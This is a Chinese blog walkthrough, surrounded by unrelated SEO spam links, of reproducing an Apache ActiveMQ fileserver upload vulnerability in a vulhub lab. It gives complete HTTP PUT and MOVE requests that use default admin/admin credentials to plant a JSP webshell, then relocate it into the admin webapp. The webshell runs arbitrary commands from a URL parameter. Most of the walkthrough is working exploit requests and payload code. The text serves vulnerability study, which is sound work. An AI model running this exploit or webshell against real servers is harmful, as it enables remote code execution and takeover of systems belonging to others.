当前位置: 首页 > news >正文

上海做网站哪家便宜seo外包公司需要什么

上海做网站哪家便宜,seo外包公司需要什么,推广专员是主要做什么,商城网站设计目标一.环境配置 腾讯云的ubuntu操作系统,已经安装有docker 和 vulhub 直接来到 启动环境docker-compose,要在root权限下运行。 docker-compose up -d 若出现等待时间过长的情况,请参考这篇文章http://t.csdnimg.cn/SYhbE 访问http://公网ip:8…

一.环境配置

腾讯云的ubuntu操作系统,已经安装有docker 和 vulhub

直接来到

启动环境docker-compose,要在root权限下运行。

docker-compose up -d

若出现等待时间过长的情况,请参考这篇文章http://t.csdnimg.cn/SYhbE

访问http://公网ip:8161

若访问成功则环境搭建成功。

二.漏洞复现

目录拼接admin,进行登录操作。默认账户密码为admin/admin。

访问以下目录,找到文件上传的地址。

http://公网ip:8161/admin/test/systemProperties.jsp

随便抓一个页面的包,我这里就抓刚刚查询目录那个页面的包。

写入webshell文件。

将报文转发到Repeater。

进入Repeater中的Header模块,修改报文第一行,并在报文最后添加木马。

返回Repeater中的Raw模块,点击Go发送报文。

PUT /fileserver/1.jsp HTTP/1.1
Host: 公网ip:8161
Cache-Control: max-age=0
Authorization: Basic YWRtaW46YWRtaW4=
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=rveyn……………………
Connection: close<%@ page import="java.io.*" %>
<%
try {
String cmd = request.getParameter("cmd");
Process child = Runtime.getRuntime().exec(cmd);
InputStream in = child.getInputStream();
int c;
while ((c = in.read()) != -1) {
out.print((char)c);
}
in.close();
try {
child.waitFor();
} catch (InterruptedException e) {
e.printStackTrace();
}
} catch (IOException e) {
System.err.println(e);
}
%>

上传成功。

访问http://公网ip:8161/fileserver/1.jsp

发现上传成功,但没有解析

ActiveMQ Web控制台分为三个应用程序:admin,api和fileserver,其中admin是管理员页面,api是界面,fileserver是用于存储文件的界面;admin和api需要先登录才能使用,fileserver不需要登录。

利用MOVE,将木马文件移动到api或者admin,我这边是移动到了admin目录下

还是刚刚的报文,更该第一行和增加第三行。第三行的路径就是最开始查询到的目录。

MOVE /fileserver/1.jsp HTTP/1.1
Host: 公网ip:8161
Destination:file:///opt/activemq/webapps/admin/1.jsp
Cache-Control: max-age=0
Authorization: Basic YWRtaW46YWRtaW4=
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=yts9……………………
Connection: close
Content-Length: 397<%@ page import="java.io.*" %>
<%
try {
String cmd = request.getParameter("cmd");
Process child = Runtime.getRuntime().exec(cmd);
InputStream in = child.getInputStream();
int c;
while ((c = in.read()) != -1) {
out.print((char)c);
}
in.close();
try {
child.waitFor();
} catch (InterruptedException e) {
e.printStackTrace();
}
} catch (IOException e) {
System.err.println(e);
}
%>

访问文件http://公网ip:8161/admin/1.jsp?cmd=ls

执行命令whoami

漏洞复现完成。

http://www.ritt.cn/news/23339.html

相关文章:

  • 收款网站怎么建设网络营销推广方案ppt
  • 做新疆行知书网站步骤广州疫情最新情况
  • 海尔网站建设的缺点醴陵网站制作
  • 影视网站建设的总体目标sem推广托管公司
  • 专业app软件定制郑州企业网站seo
  • wordpress 显示菜单seo网站推广建站服务商
  • 衡水微信网站建设百度 个人中心首页
  • 电信的网做的网站移动网打不开该找电信还是移动营销软文300字范文
  • 宁波专业网站搭建地址百度推广需要什么条件
  • 护栏板销售网站怎么做如何注册域名及网站
  • 做物流的网站都有什么作用英语seo
  • 百度关键词优化外包天津seo关键词排名优化
  • 深圳专业做网站排名公司成都新站软件快速排名
  • php网站开发工程师招聘会it行业培训机构一般多少钱
  • 张掖专业做网站的公司抖音seo什么意思
  • 南充做网站 www.xinbay.com注册网站查询
  • 宣传网站有哪些淘宝关键词搜索工具
  • 网站免费网站app优化设计三年级上册答案语文
  • 郑州做网站hnmaorui电商培训机构有哪些?哪家比较好
  • 重庆网站设计工作室优化公司组织架构
  • 中力建设网站郑州网站推广排名公司
  • 做网站的服务器多少钱网站流量统计系统
  • wordpress 插件 加速seo招聘网
  • 专业建站教程网络舆情监测
  • 哈尔滨网站建设推广营销策划方案案例
  • 云南做网站费用怎么开通百度推广账号
  • 看24小时b站直播环球军事新闻最新消息
  • 网站制作_做网站_耐思智慧自己做网站网页归档
  • 做挂件的网站一个完整的营销策划案范文
  • 天台城乡规划建设局网站互联网广告投放